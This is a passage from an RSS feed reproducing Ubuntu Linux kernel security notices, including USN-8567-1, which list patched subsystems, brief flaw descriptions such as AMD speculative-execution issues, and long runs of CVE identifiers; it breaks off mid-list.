Ubuntu Linux kernel 6.8, 6.17 and 7.0 contained a NULL pointer dereference
when handling AppArmor network socket mediation. A local attacker could use
this to cause a kernel oops. (CVE-2026-47337)

Several security issues were discovered in the Linux kernel.
An attacker could possibly use these to compromise the system.
This update corrects flaws in the following subsystems:
  - PSP security protocol;
  - ARM64 architecture;
  - PowerPC architecture;
  - RISC-V architecture;
  - S390 architecture;
  - User-Mode Linux (UML);
  - x86 architecture;
  - Block layer subsystem;
  - Cryptographic API;
  - Intel NPU Driver;
  - DRBD Distributed Replicated Block Device drivers;
  - Rados block device (RBD) driver;
  - Ublk userspace block driver;
  - Compressed RAM block device driver;
  - Bluetooth drivers;
  - Bus devices;
  - Character device driver;
  - TPM device driver;
  - Clock framework and drivers;
  - CPU frequency scaling framework;
  - Hardware crypto device drivers;
  - EDAC drivers;
  - EFI core;
  - FWCTL subsystem;
  - GPU drivers;
  - Greybus drivers;
  - HID subsystem;
  - Microsoft Hyper-V drivers;
  - Hardware monitoring drivers;
  - I2C subsystem;
  - I3C subsystem;
  - IIO subsystem;
  - InfiniBand drivers;
  - Input Device core drivers;
  - IOMMU subsystem;
  - LED subsystem;
  - Mailbox framework;
  - Multiple devices driver;
  - Media drivers;
  - NVIDIA Tegra memory controller driver;
  - IBM Advanced System Management driver;
  - MTD block device drivers;
  - Network drivers;
  - Ethernet bonding driver;
  - Mellanox network drivers;
  - Microsoft Azure Network Adapter (MANA) driver;
  - STMicroelectronics network drivers;
  - MediaTek network drivers;
  - NTB driver;
  - NVME drivers;
  - Device tree and open firmware driver;
  - PCI subsystem;
  - Pin controllers subsystem;
  - Chrome hardware platform drivers;
  - ACPI WMI driver;
  - x86 platform drivers;
  - Generic PM domains;
  - MediaTek PM domains;
  - Power supply drivers;
  - Remote Processor subsystem;
  - MPAM driver;
  - Amlogic Meson reset controller drivers;
  - S/390 drivers;
  - SCSI subsystem;
  - NVIDIA Tegra Control Backbone (CBB) driver;
  - SPI subsystem;
  - Greybus lights staging drivers;
  - Media staging drivers;
  - Realtek RTL8723BS SDIO drivers;
  - SM750 framebuffer staging driver;
  - TCM subsystem;
  - Thermal drivers;
  - TTY drivers;
  - USB Device Class drivers;
  - ULPI bus;
  - USB Gadget drivers;
  - USB Type-C support driver;
  - TI TPS6598x USB Power Delivery controller driver;
  - USB over IP driver;
  - vDPA drivers;
  - VFIO drivers;
  - Framebuffer layer;
  - TSM AMD SEV Guest driver;
  - Xen hypervisor drivers;
  - 9P distributed file system;
  - File systems infrastructure;
  - AFS file system;
  - BTRFS file system;
  - Ceph distributed file system;
  - EROFS file system;
  - Ext4 file system;
  - F2FS file system;
  - FUSE (File system in Userspace);
  - GFS2 file system;
  - HFS+ file system;
  - HugeTLB file system;
  - Journaling layer for block devices (JBD2);
  - Network file system (NFS) server daemon;
  - NILFS2 file system;
  - File system notification infrastructure;
  - NTFS3 file system;
  - OCFS2 file system;
  - Overlay file system;
  - Diskquota system;
  - SMB network file system;
  - Tracing file system;
  - UDF file system;
  - XFS file system;
  - DRM TTM subsystem;
  - Codetag library;
  - Control group (cgroup);
  - Kernel CPU control infrastructure;
  - Memory management;
  - QorIQ DPAA2 FSL-MC bus driver;
  - Freescale ENETC Ethernet drivers;
  - Memory Management;
  - KVM subsystem;
  - padata parallel execution mechanism;
  - PPP protocol drivers and compressors;
  - Bluetooth subsystem;
  - Networking core;
  - Netfilter;
  - Network traffic control;
  - Tracing infrastructure;
  - User-space API (UAPI);
  - io_uring subsystem;
  - IPC subsystem;
  - Audit subsystem;
  - BPF subsystem;
  - Kernel exit() syscall;
  - Kernel fork() syscall;
  - Kernel futex primitives;
  - Locking primitives;
  - Padata parallel execution mechanism;
  - Scheduler infrastructure;
  - Timer subsystem;
  - Cryptographic library;
  - Scatterlist API;
  - Heterogeneous memory management;
  - KASAN memory debugging framework;
  - 802.1Q VLAN protocol;
  - B.A.T.M.A.N. meshing protocol;
  - Ethernet bridge;
  - CAIF protocol;
  - CAN network layer;
  - Ceph Core library;
  - Distributed Switch Architecture;
  - IPv4 networking;
  - IPv6 networking;
  - MAC80211 subsystem;
  - Multipath TCP;
  - NFC subsystem;
  - Open vSwitch;
  - Packet sockets;
  - Phonet protocol;
  - Qualcomm IPC Router (QRTR);
  - RDS protocol;
  - RxRPC session sockets;
  - SCTP protocol;
  - SMC sockets;
  - Stream parser;
  - TIPC protocol;
  - TLS protocol;
  - Unix domain sockets;
  - VMware vSockets driver;
  - XFRM subsystem;
  - Integrity Measurement Architecture(IMA) framework;
  - Landlock security;
  - SELinux security module;
  - ALSA framework;
  - Generic PCM loopback sound driver;
  - FireWire sound drivers;
  - HD-audio driver;
  - Creative Sound Blaster X-Fi driver;
  - QCOM ASoC drivers;
  - SOF drivers;
  - STI ASoC drivers;
  - USB sound devices;
  - Objtool;
(CVE-2026-31532, CVE-2026-31574, CVE-2026-31575, CVE-2026-31576,
CVE-2026-31577, CVE-2026-31578, CVE-2026-31579, CVE-2026-31580,
CVE-2026-31581, CVE-2026-31582, CVE-2026-31583, CVE-2026-31584,
CVE-2026-31585, CVE-2026-31586, CVE-2026-31587, CVE-2026-31588,
CVE-2026-31589, CVE-2026-31590, CVE-2026-31591, CVE-2026-31592,
CVE-2026-31593, CVE-2026-31594, CVE-2026-31595, CVE-2026-31596,
CVE-2026-31597, CVE-2026-31598, CVE-2026-31599, CVE-2026-31600,
CVE-2026-31601, CVE-2026-31602, CVE-2026-31603, CVE-2026-31604,
CVE-2026-31605, CVE-2026-31606, CVE-2026-31607, CVE-2026-31608,
CVE-2026-31609, CVE-2026-31610, CVE-2026-31611, CVE-2026-31612,
CVE-2026-31613, CVE-2026-31614, CVE-2026-31615, CVE-2026-31616,
CVE-2026-31617, CVE-2026-31618, CVE-2026-31619, CVE-2026-31620,
CVE-2026-31621, CVE-2026-31622, CVE-2026-31623, CVE-2026-31624,
CVE-2026-31625, CVE-2026-31626, CVE-2026-31627, CVE-2026-31628,
CVE-2026-31629, CVE-2026-31686, CVE-2026-31694, CVE-2026-31696,
CVE-2026-31697, CVE-2026-31698, CVE-2026-31699, CVE-2026-31700,
CVE-2026-31701, CVE-2026-31702, CVE-2026-31703, CVE-2026-31704,
CVE-2026-31705, CVE-2026-31706, CVE-2026-31707, CVE-2026-31708,
CVE-2026-31709, CVE-2026-31710, CVE-2026-31711, CVE-2026-31712,
CVE-2026-31713, CVE-2026-31714, CVE-2026-31715, CVE-2026-31716,
CVE-2026-31717, CVE-2026-31718, CVE-2026-31719, CVE-2026-43058,
CVE-2026-43071, CVE-2026-43072, CVE-2026-43073, CVE-2026-43348,
CVE-2026-43349, CVE-2026-43350, CVE-2026-43490, CVE-2026-43491,
CVE-2026-43492, CVE-2026-43493, CVE-2026-43494, CVE-2026-43495,
CVE-2026-43496, CVE-2026-43497, CVE-2026-43498, CVE-2026-43499,
CVE-2026-43501, CVE-2026-43502, CVE-2026-45834, CVE-2026-45835,
CVE-2026-45836, CVE-2026-45837, CVE-2026-45838, CVE-2026-45839,
CVE-2026-45840, CVE-2026-45841, CVE-2026-45842, CVE-2026-45843,
CVE-2026-45844, CVE-2026-45845, CVE-2026-45846, CVE-2026-45986,
CVE-2026-45987, CVE-2026-45988, CVE-2026-45989, CVE-2026-45990,
CVE-2026-45991, CVE-2026-45994, CVE-2026-45995, CVE-2026-45996,
CVE-2026-45997, CVE-2026-45999, CVE-2026-46001, CVE-2026-46002,
CVE-2026-46003, CVE-2026-46004, CVE-2026-46005, CVE-2026-46006,
CVE-2026-46007, CVE-2026-46008, CVE-2026-46009, CVE-2026-46010,
CVE-2026-46011, CVE-2026-46012, CVE-2026-46013, CVE-2026-46014,
CVE-2026-46015, CVE-2026-46016, CVE-2026-46018, CVE-2026-46019,
CVE-2026-46020, CVE-2026-46021, CVE-2026-46022, CVE-2026-46023,
CVE-2026-46024, CVE-2026-46025, CVE-2026-46026, CVE-2026-46027,
CVE-2026-46028, CVE-2026-46029, CVE-2026-46030, CVE-2026-46031,
CVE-2026-46032, CVE-2026-46033, CVE-2026-46034, CVE-2026-46035,
CVE-2026-46036, CVE-2026-46037, CVE-2026-46038, CVE-2026-46039,
CVE-2026-46040, CVE-2026-46041, CVE-2026-46042, CVE-2026-46043,
CVE-2026-46044, CVE-2026-46045, CVE-2026-46046, CVE-2026-46047,
CVE-2026-46049, CVE-2026-46050, CVE-2026-46051, CVE-2026-46052,
CVE-2026-46053, CVE-2026-46054, CVE-2026-46056, CVE-2026-46057,
CVE-2026-46058, CVE-2026-46059, CVE-2026-46060, CVE-2026-46061,
CVE-2026-46062, CVE-2026-46063, CVE-2026-46064, CVE-2026-46065,
CVE-2026-46066, CVE-2026-46067, CVE-2026-46068, CVE-2026-46069,
CVE-2026-46070, CVE-2026-46071, CVE-2026-46072, CVE-2026-46073,
CVE-2026-46074, CVE-2026-46075, CVE-2026-46076, CVE-2026-46077,
CVE-2026-46078, CVE-2026-46079, CVE-2026-46080, CVE-2026-46081,
CVE-2026-46082, CVE-2026-46083, CVE-2026-46084, CVE-2026-46085,
CVE-2026-46086, CVE-2026-46087, CVE-2026-46088, CVE-2026-46089,
CVE-2026-46090, CVE-2026-46091, CVE-2026-46092, CVE-2026-46093,
CVE-2026-46094, CVE-2026-46095, CVE-2026-46096, CVE-2026-46097,
CVE-2026-46098, CVE-2026-46099, CVE-2026-46100, CVE-2026-46101,
CVE-2026-46102, CVE-2026-46103, CVE-2026-46104, CVE-2026-46105,
CVE-2026-46106, CVE-2026-46107, CVE-2026-46108, CVE-2026-46109,
CVE-2026-46110, CVE-2026-46111, CVE-2026-46112, CVE-2026-46113,
CVE-2026-46114, CVE-2026-46115, CVE-2026-46116, CVE-2026-46117,
CVE-2026-46118, CVE-2026-46119, CVE-2026-46120, CVE-2026-46121,
CVE-2026-46122, CVE-2026-46123, CVE-2026-46124, CVE-2026-46125,
CVE-2026-46126, CVE-2026-46127, CVE-2026-46128, CVE-2026-46129,
CVE-2026-46130, CVE-2026-46131, CVE-2026-46132, CVE-2026-46133,
CVE-2026-46134, CVE-2026-46135, CVE-2026-46136, CVE-2026-46137,
CVE-2026-46138, CVE-2026-46139, CVE-2026-46140, CVE-2026-46141,
CVE-2026-46142, CVE-2026-46143, CVE-2026-46144, CVE-2026-46145,
CVE-2026-46146, CVE-2026-46147, CVE-2026-46148, CVE-2026-46149,
CVE-2026-46150, CVE-2026-46151, CVE-2026-46152, CVE-2026-46153,
CVE-2026-46154, CVE-2026-46155, CVE-2026-46156, CVE-2026-46157,
CVE-2026-46158, CVE-2026-46159, CVE-2026-46160, CVE-2026-46161,
CVE-2026-46162, CVE-2026-46163, CVE-2026-46164, CVE-2026-46165,
CVE-2026-46166, CVE-2026-46167, CVE-2026-46168, CVE-2026-46169,
CVE-2026-46170, CVE-2026-46171, CVE-2026-46172, CVE-2026-46173,
CVE-2026-46174, CVE-2026-46175, CVE-2026-46176, CVE-2026-46177,
CVE-2026-46178, CVE-2026-46179, CVE-2026-46180, CVE-2026-46181,
CVE-2026-46182, CVE-2026-46183, CVE-2026-46184, CVE-2026-46185,
CVE-2026-46186, CVE-2026-46187, CVE-2026-46188, CVE-2026-46189,
CVE-2026-46190, CVE-2026-46191, CVE-2026-46192, CVE-2026-46193,
CVE-2026-46194, CVE-2026-46195, CVE-2026-46196, CVE-2026-46197,
CVE-2026-46198, CVE-2026-46199, CVE-2026-46200, CVE-2026-46201,
CVE-2026-46202, CVE-2026-46203, CVE-2026-46204, CVE-2026-46205,
CVE-2026-46206, CVE-2026-46207, CVE-2026-46208, CVE-2026-46209,
CVE-2026-46210, CVE-2026-46211, CVE-2026-46212, CVE-2026-46213,
CVE-2026-46214, CVE-2026-46215, CVE-2026-46216, CVE-2026-46218,
CVE-2026-46219, CVE-2026-46220, CVE-2026-46221, CVE-2026-46222,
CVE-2026-46223, CVE-2026-46224, CVE-2026-46225, CVE-2026-46226,
CVE-2026-46227, CVE-2026-46228, CVE-2026-46229, CVE-2026-46230,
CVE-2026-46231, CVE-2026-46232, CVE-2026-46233, CVE-2026-46234,
CVE-2026-46235, CVE-2026-46236, CVE-2026-46238, CVE-2026-46239,
CVE-2026-46240, CVE-2026-46241, CVE-2026-46242, CVE-2026-46243,
CVE-2026-46244, CVE-2026-46273, CVE-2026-46274, CVE-2026-46275,
CVE-2026-46276, CVE-2026-46277, CVE-2026-46278, CVE-2026-46279,
CVE-2026-46280, CVE-2026-46281, CVE-2026-46282, CVE-2026-46283,
CVE-2026-46284, CVE-2026-46285, CVE-2026-46286, CVE-2026-46287,
CVE-2026-46288, CVE-2026-46289, CVE-2026-46290, CVE-2026-46291,
CVE-2026-46292, CVE-2026-46293, CVE-2026-46294, CVE-2026-46295,
CVE-2026-46296, CVE-2026-46297, CVE-2026-46298, CVE-2026-46299,
CVE-2026-46301, CVE-2026-46302, CVE-2026-46303, CVE-2026-46304,
CVE-2026-46305, CVE-2026-46306, CVE-2026-46307, CVE-2026-46308,
CVE-2026-46309, CVE-2026-46310, CVE-2026-46311, CVE-2026-46312,
CVE-2026-46313, CVE-2026-46314, CVE-2026-46315, CVE-2026-46316,
CVE-2026-46317, CVE-2026-46318, CVE-2026-46319, CVE-2026-46320,
CVE-2026-46321, CVE-2026-46322, CVE-2026-46323, CVE-2026-46324,
CVE-2026-46332, CVE-2026-52904, CVE-2026-52905, CVE-2026-52906,
CVE-2026-52907, CVE-2026-52911, CVE-2026-52912, CVE-2026-52913,
CVE-2026-52914, CVE-2026-52915, CVE-2026-52916, CVE-2026-52918,
CVE-2026-52919, CVE-2026-52920, CVE-2026-52921, CVE-2026-52922,
CVE-2026-52923, CVE-2026-52925, CVE-2026-52926, CVE-2026-52927,
CVE-2026-52928, CVE-2026-52931, CVE-2026-52932, CVE-2026-52933,
CVE-2026-52934, CVE-2026-52936, CVE-2026-52937, CVE-2026-52941,
CVE-2026-52943, CVE-2026-52944, CVE-2026-52949, CVE-2026-52950,
CVE-2026-52951, CVE-2026-52952, CVE-2026-52953, CVE-2026-52954,
CVE-2026-52955, CVE-2026-52956, CVE-2026-52957, CVE-2026-52958,
CVE-2026-52959, CVE-2026-52960, CVE-2026-52961, CVE-2026-52962,
CVE-2026-52963, CVE-2026-52964, CVE-2026-52965, CVE-2026-52967,
CVE-2026-52968, CVE-2026-52969, CVE-2026-52970, CVE-2026-52971,
CVE-2026-52973, CVE-2026-52974, CVE-2026-52975, CVE-2026-52976,
CVE-2026-52977, CVE-2026-52978, CVE-2026-52979, CVE-2026-52980,
CVE-2026-52981, CVE-2026-52982, CVE-2026-52983, CVE-2026-52984,
CVE-2026-52985, CVE-2026-52986, CVE-2026-52987, CVE-2026-52988,
CVE-2026-52989, CVE-2026-52990, CVE-2026-52991, CVE-2026-52992,
CVE-2026-52993, CVE-2026-52994, CVE-2026-52995, CVE-2026-52996,
CVE-2026-52997, CVE-2026-52998, CVE-2026-52999, CVE-2026-53000,
CVE-2026-53001, CVE-2026-53002, CVE-2026-53003, CVE-2026-53004,
CVE-2026-53005, CVE-2026-53006, CVE-2026-53007, CVE-2026-53008,
CVE-2026-53009, CVE-2026-53010, CVE-2026-53011, CVE-2026-53012,
CVE-2026-53013, CVE-2026-53014, CVE-2026-53015, CVE-2026-53016,
CVE-2026-53017, CVE-2026-53018, CVE-2026-53019, CVE-2026-53020,
CVE-2026-53021, CVE-2026-53022, CVE-2026-53023, CVE-2026-53024,
CVE-2026-53025, CVE-2026-53026, CVE-2026-53027, CVE-2026-53028,
CVE-2026-53029, CVE-2026-53030, CVE-2026-53031, CVE-2026-53032,
CVE-2026-53033, CVE-2026-53034, CVE-2026-53035, CVE-2026-53036,
CVE-2026-53037, CVE-2026-53038, CVE-2026-53039, CVE-2026-53040,
CVE-2026-53041, CVE-2026-53042, CVE-2026-53043, CVE-2026-53044,
CVE-2026-53045, CVE-2026-53046, CVE-2026-53047, CVE-2026-53048,
CVE-2026-53049, CVE-2026-53050, CVE-2026-53051, CVE-2026-53052,
CVE-2026-53053, CVE-2026-53054, CVE-2026-53055, CVE-2026-53056,
CVE-2026-53057, CVE-2026-53058, CVE-2026-53059, CVE-2026-53060,
CVE-2026-53061, CVE-2026-53062, CVE-2026-53063, CVE-2026-53064,
CVE-2026-53065, CVE-2026-53066, CVE-2026-53067, CVE-2026-53068,
CVE-2026-53069, CVE-2026-53070, CVE-2026-53071, CVE-2026-53072,
CVE-2026-53073, CVE-2026-53074, CVE-2026-53075, CVE-2026-53076,
CVE-2026-53077, CVE-2026-53078, CVE-2026-53079, CVE-2026-53080,
CVE-2026-53081, CVE-2026-53082, CVE-2026-53083, CVE-2026-53084,
CVE-2026-53085, CVE-2026-53086, CVE-2026-53087, CVE-2026-53088,
CVE-2026-53089, CVE-2026-53090, CVE-2026-53091, CVE-2026-53092,
CVE-2026-53093, CVE-2026-53094, CVE-2026-53095, CVE-2026-53096,
CVE-2026-53097, CVE-2026-53098, CVE-2026-53099, CVE-2026-53100,
CVE-2026-53101, CVE-2026-53102, CVE-2026-53103, CVE-2026-53104,
CVE-2026-53105, CVE-2026-53106, CVE-2026-53107, CVE-2026-53108,
CVE-2026-53109, CVE-2026-53110, CVE-2026-53111, CVE-2026-53112,
CVE-2026-53113, CVE-2026-53114, CVE-2026-53115, CVE-2026-53116,
CVE-2026-53117, CVE-2026-53118, CVE-2026-53119, CVE-2026-53120,
CVE-2026-53121, CVE-2026-53122, CVE-2026-53123, CVE-2026-53124,
CVE-2026-53125, CVE-2026-53126, CVE-2026-53127, CVE-2026-53128,
CVE-2026-53129, CVE-2026-53130, CVE-2026-53174, CVE-2026-53277,
CVE-2026-53278, CVE-2026-53279, CVE-2026-53280, CVE-2026-53281,
CVE-2026-53282, CVE-2026-53283, CVE-2026-53284, CVE-2026-53285,
CVE-2026-53286, CVE-2026-53287, CVE-2026-53288, CVE-2026-53289,
CVE-2026-53290, CVE-2026-53291, CVE-2026-53292, CVE-2026-53293,
CVE-2026-53294, CVE-2026-53295, CVE-2026-53296, CVE-2026-53297,
CVE-2026-53298, CVE-2026-53299, CVE-2026-53300, CVE-2026-53301,
CVE-2026-53302, CVE-2026-53303, CVE-2026-53304, CVE-2026-53305,
CVE-2026-53306, CVE-2026-53307, CVE-2026-53308, CVE-2026-53309,
CVE-2026-53310, CVE-2026-53311, CVE-2026-53312, CVE-2026-53313,
CVE-2026-53314, CVE-2026-53315, CVE-2026-53316, CVE-2026-53317,
CVE-2026-53318, CVE-2026-53319, CVE-2026-53320, CVE-2026-53321,
CVE-2026-53322, CVE-2026-53323, CVE-2026-53324, CVE-2026-53357,
CVE-2026-53358, CVE-2026-53360, CVE-2026-53364, CVE-2026-53365)]]></content:encoded>
</item>
<item>
<title><![CDATA[USN-8567-1: Linux kernel vulnerabilities]]></title>
<description><![CDATA[It was discovered that some AMD processors did not properly clear data in
the floating point divider unit during speculative execution. A local
attacker could use this to expose sensitive information. (CVE-2025-54505)

It was discovered that some AMD Zen 2 processors did not properly isolate
shar...]]></description>
<link>https://tsecurity.de/de/3681567/unix-server/usn-8567-1-linux-kernel-vulnerabilities/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3681567/unix-server/usn-8567-1-linux-kernel-vulnerabilities/</guid>
<pubDate>Mon, 20 Jul 2026 17:46:49 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[It was discovered that some AMD processors did not properly clear data in
the floating point divider unit during speculative execution. A local
attacker could use this to expose sensitive information. (CVE-2025-54505)

It was discovered that some AMD Zen 2 processors did not properly isolate
shared resources in the operation cache. A local attacker could possibly
use this issue to corrupt instructions executed at a higher privilege
level, resulting in privilege escalation. (CVE-2025-54518)

It was discovered that some AMD Zen 5 processors supporting RDSEED
instruction did not properly handle entropy, potentially resulting in the
consumption of insufficiently random values. A local attacker could
possibly use this issue to influence the values returned by the RDSEED
instruction causing loss of confidentiality and integrity. (CVE-2025-62626)

Several security issues were discovered in the Linux kernel.
An attacker could possibly use these to compromise the system.
This update corrects flaws in the following subsystems:
  - ARM64 architecture;
  - RISC-V architecture;
  - S390 architecture;
  - x86 architecture;
  - Block layer subsystem;
  - Cryptographic API;
  - Compute Acceleration Framework;
  - ACPI drivers;
  - Serial ATA and Parallel ATA drivers;
  - Drivers core;
  - Power management core;
  - DRBD Distributed Replicated Block Device drivers;
  - Rados block device (RBD) driver;
  - Compressed RAM block device driver;
  - Bluetooth drivers;
  - Bus devices;
  - Character device driver;
  - Clock framework and drivers;
  - Data acquisition framework and drivers;
  - Counter interface drivers;
  - CPU frequency scaling framework;
  - Hardware crypto device drivers;
  - CXL (Compute Express Link) drivers;
  - DMA engine subsystem;
  - EDAC drivers;
  - EFI core;
  - GPU drivers;
  - Greybus drivers;
  - HID subsystem;
  - Hardware monitoring drivers;
  - I2C subsystem;
  - IIO ADC drivers;
  - IIO subsystem;
  - InfiniBand drivers;
  - Input Device (Miscellaneous) drivers;
  - IRQ chip drivers;
  - LED subsystem;
  - Mailbox framework;
  - Multiple devices driver;
  - Media drivers;
  - MediaTek SMI driver;
  - NVIDIA Tegra memory controller driver;
  - Fastrpc Driver;
  - IBM Advanced System Management driver;
  - MMC subsystem;
  - MTD block device drivers;
  - Network drivers;
  - Ethernet bonding driver;
  - Mellanox network drivers;
  - Microsoft Azure Network Adapter (MANA) driver;
  - STMicroelectronics network drivers;
  - Ethernet team driver;
  - MediaTek network drivers;
  - Near Field Communication (NFC) drivers;
  - NTB driver;
  - NVDIMM (Non-Volatile Memory Device) drivers;
  - NVME drivers;
  - Device tree and open firmware driver;
  - PCI subsystem;
  - Pin controllers subsystem;
  - x86 platform drivers;
  - Broadcom BCM2835 power domain driver;
  - Generic PM domains;
  - i.MX PM domains;
  - Remote Processor subsystem;
  - S/390 drivers;
  - SCSI subsystem;
  - SLIMbus drivers;
  - Freescale SoC drivers;
  - Microchip PolarFire SoC system controller driver;
  - SPI subsystem;
  - Media staging drivers;
  - Realtek RTL8723BS SDIO drivers;
  - SM750 framebuffer staging driver;
  - TCM subsystem;
  - Thermal drivers;
  - TTY drivers;
  - UFS subsystem;
  - Cadence USB3 driver;
  - USB Device Class drivers;
  - ULPI bus;
  - USB core drivers;
  - DesignWare USB2 driver;
  - USB Gadget drivers;
  - USB Host Controller drivers;
  - Mustek MDC800 USB digital camera driver;
  - USB YUREX driver;
  - Renesas USBHS Controller drivers;
  - USB Type-C Connector System Software Interface driver;
  - VFIO drivers;
  - Framebuffer layer;
  - TSM TDX Guest driver;
  - Xen hypervisor drivers;
  - File systems infrastructure;
  - BTRFS file system;
  - Ceph distributed file system;
  - EROFS file system;
  - Ext4 file system;
  - F2FS file system;
  - FUSE (File system in Userspace);
  - GFS2 file system;
  - HFS+ file system;
  - Journaling layer for block devices (JBD2);
  - Network file systems library;
  - Network file system (NFS) server daemon;
  - NILFS2 file system;
  - File system notification infrastructure;
  - NTFS3 file system;
  - OCFS2 file system;
  - Diskquota system;
  - SMB network file system;
  - SquashFS file system;
  - Tracing file system;
  - UDF file system;
  - XFS file system;
  - Kernel CPU control infrastructure;
  - QorIQ DPAA2 FSL-MC bus driver;
  - Memory Management;
  - Integrity Measurement Architecture(IMA) framework;
  - KVM subsystem;
  - Memory management;
  - Networking core;
  - padata parallel execution mechanism;
  - PPP protocol drivers and compressors;
  - Linux Security Modules (LSM) Framework;
  - Tracing infrastructure;
  - Network traffic control;
  - Distributed Switch Architecture;
  - IPv4 networking;
  - IP tunnels definitions;
  - MAC80211 subsystem;
  - Netfilter;
  - User-space API (UAPI);
  - io_uring subsystem;
  - Audit subsystem;
  - BPF subsystem;
  - Control group (cgroup);
  - Perf events;
  - Kernel exit() syscall;
  - Kernel fork() syscall;
  - Kernel futex primitives;
  - KProbes tracing;
  - Locking primitives;
  - Kernel module support;
  - Padata parallel execution mechanism;
  - Cryptographic library;
  - Heterogeneous memory management;
  - KASAN memory debugging framework;
  - Asynchronous Transfer Mode (ATM) subsystem;
  - B.A.T.M.A.N. meshing protocol;
  - Bluetooth subsystem;
  - Ethernet bridge;
  - CAIF protocol;
  - CAN network layer;
  - Ceph Core library;
  - IPv6 networking;
  - XFRM subsystem;
  - L2TP protocol;
  - Management Component Transport Protocol (MCTP);
  - Multipath TCP;
  - NCSI (Network Controller Sideband Interface) driver;
  - NFC subsystem;
  - Open vSwitch;
  - Packet sockets;
  - Qualcomm IPC Router (QRTR);
  - RDS protocol;
  - RF switch subsystem;
  - Rose network layer;
  - RxRPC session sockets;
  - SCTP protocol;
  - SMC sockets;
  - Stream parser;
  - Sun RPC protocol;
  - TIPC protocol;
  - TLS protocol;
  - Unix domain sockets;
  - VMware vSockets driver;
  - Wireless networking;
  - X.25 network layer;
  - eXpress Data Path;
  - Landlock security;
  - ALSA framework;
  - Generic PCM loopback sound driver;
  - FireWire sound drivers;
  - HD-audio driver;
  - Creative Sound Blaster X-Fi driver;
  - AMD SoC Alsa drivers;
  - QCOM ASoC drivers;
  - Samsung ASoC drivers;
  - SoC audio core drivers;
  - SOF drivers;
  - STI ASoC drivers;
  - USB sound devices;
  - Objtool;
(CVE-2025-21709, CVE-2025-22116, CVE-2025-38426, CVE-2025-39764,
CVE-2025-40135, CVE-2025-40150, CVE-2025-68175, CVE-2025-68239,
CVE-2025-68334, CVE-2025-68736, CVE-2025-71152, CVE-2025-71161,
CVE-2025-71203, CVE-2025-71221, CVE-2025-71269, CVE-2025-71287,
CVE-2025-71288, CVE-2026-22981, CVE-2026-22985, CVE-2026-22993,
CVE-2026-23004, CVE-2026-23066, CVE-2026-23104, CVE-2026-23118,
CVE-2026-23138, CVE-2026-23154, CVE-2026-23157, CVE-2026-23171,
CVE-2026-23207, CVE-2026-23226, CVE-2026-23227, CVE-2026-23244,
CVE-2026-23245, CVE-2026-23246, CVE-2026-23253, CVE-2026-23255,
CVE-2026-23270, CVE-2026-23271, CVE-2026-23276, CVE-2026-23277,
CVE-2026-23279, CVE-2026-23281, CVE-2026-23284, CVE-2026-23285,
CVE-2026-23286, CVE-2026-23287, CVE-2026-23289, CVE-2026-23290,
CVE-2026-23291, CVE-2026-23292, CVE-2026-23293, CVE-2026-23296,
CVE-2026-23298, CVE-2026-23300, CVE-2026-23302, CVE-2026-23303,
CVE-2026-23304, CVE-2026-23306, CVE-2026-23307, CVE-2026-23308,
CVE-2026-23310, CVE-2026-23312, CVE-2026-23313, CVE-2026-23315,
CVE-2026-23317, CVE-2026-23318, CVE-2026-23319, CVE-2026-23321,
CVE-2026-23324, CVE-2026-23325, CVE-2026-23330, CVE-2026-23334,
CVE-2026-23335, CVE-2026-23336, CVE-2026-23339, CVE-2026-23340,
CVE-2026-23343, CVE-2026-23347, CVE-2026-23352, CVE-2026-23356,
CVE-2026-23357, CVE-2026-23359, CVE-2026-23360, CVE-2026-23361,
CVE-2026-23362, CVE-2026-23363, CVE-2026-23364, CVE-2026-23365,
CVE-2026-23367, CVE-2026-23368, CVE-2026-23369, CVE-2026-23370,
CVE-2026-23372, CVE-2026-23374, CVE-2026-23375, CVE-2026-23378,
CVE-2026-23379, CVE-2026-23381, CVE-2026-23382, CVE-2026-23383,
CVE-2026-23386, CVE-2026-23387, CVE-2026-23388, CVE-2026-23389,
CVE-2026-23391, CVE-2026-23395, CVE-2026-23396, CVE-2026-23397,
CVE-2026-23398, CVE-2026-23399, CVE-2026-23401, CVE-2026-23412,
CVE-2026-23413, CVE-2026-23414, CVE-2026-23418, CVE-2026-23419,
CVE-2026-23420, CVE-2026-23426, CVE-2026-23434, CVE-2026-23438,
CVE-2026-23439, CVE-2026-23440, CVE-2026-23441, CVE-2026-23442,
CVE-2026-23444, CVE-2026-23446, CVE-2026-23447, CVE-2026-23448,
CVE-2026-23449, CVE-2026-23452, CVE-2026-23454, CVE-2026-23456,
CVE-2026-23457, CVE-2026-23458, CVE-2026-23460, CVE-2026-23461,
CVE-2026-23462, CVE-2026-23463, CVE-2026-23464, CVE-2026-23465,
CVE-2026-23468, CVE-2026-23470, CVE-2026-23474, CVE-2026-23475,
CVE-2026-31389, CVE-2026-31391, CVE-2026-31392, CVE-2026-31393,
CVE-2026-31394, CVE-2026-31396, CVE-2026-31399, CVE-2026-31400,
CVE-2026-31403, CVE-2026-31405, CVE-2026-31407, CVE-2026-31408,
CVE-2026-31409, CVE-2026-31412, CVE-2026-31413, CVE-2026-31414,
CVE-2026-31415, CVE-2026-31416, CVE-2026-31417, CVE-2026-31421,
CVE-2026-31422, CVE-2026-31423, CVE-2026-31424, CVE-2026-31425,
CVE-2026-31426, CVE-2026-31427, CVE-2026-31428, CVE-2026-31429,
CVE-2026-31430, CVE-2026-31432, CVE-2026-31433, CVE-2026-31434,
CVE-2026-31438, CVE-2026-31439, CVE-2026-31440, CVE-2026-31441,
CVE-2026-31446, CVE-2026-31447, CVE-2026-31449, CVE-2026-31450,
CVE-2026-31451, CVE-2026-31452, CVE-2026-31453, CVE-2026-31454,
CVE-2026-31455, CVE-2026-31458, CVE-2026-31464, CVE-2026-31466,
CVE-2026-31467, CVE-2026-31469, CVE-2026-31470, CVE-2026-31473,
CVE-2026-31474, CVE-2026-31476, CVE-2026-31477, CVE-2026-31480,
CVE-2026-31482, CVE-2026-31483, CVE-2026-31485, CVE-2026-31487,
CVE-2026-31488, CVE-2026-31489, CVE-2026-31492, CVE-2026-31494,
CVE-2026-31495, CVE-2026-31496, CVE-2026-31497, CVE-2026-31498,
CVE-2026-31499, CVE-2026-31500, CVE-2026-31502, CVE-2026-31503,
CVE-2026-31505, CVE-2026-31506, CVE-2026-31507, CVE-2026-31508,
CVE-2026-31509, CVE-2026-31510, CVE-2026-31511, CVE-2026-31512,
CVE-2026-31515, CVE-2026-31516, CVE-2026-31518, CVE-2026-31519,
